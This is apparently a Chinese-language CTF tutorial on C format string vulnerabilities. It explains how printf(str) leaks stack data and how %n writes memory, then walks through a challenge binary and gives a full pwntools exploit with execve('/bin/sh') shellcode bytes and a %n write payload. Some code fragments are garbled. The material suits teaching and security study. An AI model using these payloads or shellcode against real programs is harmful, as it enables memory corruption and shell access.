在我们学习c语言的时候我们就知道在输出或者输入的时候需要使用%s%d等等格式化字符,此处不过多介绍,详情可以去看看c语言的基础知识。

此处放出一些常见的格式化字符串函数:

1. #include  2. int printf(const char *format, ...);3. int fprintf(FILE stream, const char format, ...);4. int dprintf(int fd, const char *format, ...);5. int sprintf(char str, const char format, ...);6. int snprintf(char str, size_t size, const char format, ...);

转换指示符号:


长度:

示例:

#include #include void mian(){    char *format = "%s";    char *arg1 ="Hello!I‘m ReStr0!";    printf(format,arg1);}此处是格式化字符串的使用方式
当我们运行它时printf("%03d.%03d.%03d.%03d", 127,0,0,1);//"127.000.000.001"2. printf("%.2f", 1.2345); // 1.233. printf("%#010x", 3735928559); // 0xdeadbeef5. printf("%s%n", "01234", &n); // n = 5

这里拿printf格式化字符举例,在glibc库中它的相关代码如下:

可以看出它从输出流种会将输出的内容按照我们设置的format进行格式化输出。

漏洞产生原因和利用原理

/***我们在正常的对格式化字符输出时大都使用printf(*format,*arg);此种形式进行输出,但是部分程序员在开发的使用,为了省事使用了,printf(*format);进行输出为了方便对比,我将在下面贴出正常和存在格式化字符漏洞的写法。***/错误:#include void main(){    char str[1024];    scanf(%s,&str);    printf(%s);}  正确:#include void main(){    char str[1024];    scanf(%s,&str);    printf(%s,str);}//但是如果我们正常输入字符的情况下,此时两个都是可以正常输出我们需要的字符串,但是当我们将%x作为arg键入后,//错误的代码会将此处的地址打印出来,通过%n操作符我们可以修改指定地址的数据以达到劫持程序流的目的。//而且此时因为数据长的很长,我们可以输入很多的格式化字符,来泄露我们需要的地址或者其他信息(canary等)。//最常见的就是通过格式化字符串漏洞泄露libc进行计算基址,泄露canary 进行bypass或者通过格式化字符串漏洞进行对got表地址某几位的改写。

CTF题目例子

int __cdecl main(int argc, const char **argv, const char **envp){  int a; // [rsp+Ch] [rbp-74h] BYREF  char str[100]; // [rsp+10h] [rbp-70h] BYREF   memset(str, 0, sizeof(str));  a = 16;  printf("ReStr0 tell you %p", &a);  __isoc99_scanf("%s", str);  printf(str);  if ( a == 32 )  {    puts("success");    system("/bin/sh");  }  else  {    puts("failure");  }  return 0;}

这道题目我是用64位进行编译的,我们审计代码得知,题目告诉你a的地址,只要我们通过格式化字符串漏洞修改a的值为32就可以getshell,我们也知道可以通过%x$n+p64(a_addr)修改值,那么我们该如何计算这个偏移x呢?

两张图看懂如何计算偏移

此处我们也可以通过pwndbg自带的fmtarg进行计算。

首先我们在printf的地方打下断点。

然后c运行后在输入出随便输入字符aaaa。

随后停在因为之前打了断点,在printf出停下,发现aaaa返回地址在0x7fffffffdb90 输入fmtarg 0x7fffffffdb90 即可计算出偏移为8。

我们也可以通过上面的两张图方法计算出偏移。

附上编译好的bin程序和exp。

binary程序下载地址

链接:https://pan.baidu.com/s/11VvBozTXEZKs3ownh4grqg 

提取码:hjtp

EXP:

# _*_ coding:utf-8 _*_from pwn import *context.log_level = 'debug' p=process("fofo")#p=remote("123.57.230.48","12342")    def debug(addr,PIE=True):    debug_str = ""    if PIE:        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)        for i in addr:            debug_str+='b *{}'.format(hex(text_base+i))        gdb.attach(p,debug_str)    else:        for i in addr:            debug_str+='b *{}'.format(hex(i))        gdb.attach(p,debug_str) def dbg():    gdb.attach(p)#-----------------------------------------------------------------------------------------s       = lambda data               :p.send(str(data))        #in case that data is an intsa      = lambda delim,data         :p.sendafter(str(delim), str(data))sl      = lambda data               :p.sendline(str(data))sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))r       = lambda numb=4096          :p.recv(numb)ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)it      = lambda                    :p.interactive()uu32    = lambda data   :u32(data.ljust(4, '\0'))uu64    = lambda data   :u64(data.ljust(8, '\0'))bp      = lambda bkp                :pdbg.bp(bkp)li      = lambda str1,data1         :log.success(str1+'========>'+hex(data1))  def dbgc(addr):    gdb.attach(p,"b*" + hex(addr) +" c") def lg(s,addr):    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"#https://www.exploit-db.com/shellcodes#----------------------------------------------------------------------------------------- ru("0x")stack = int(r(12),16)#lg('stack',stack)#print#log.info(hex(stack))print hex(stack) pay = "%32c%9$n"+p64(stack)sl(pay)sleep(0.1)it()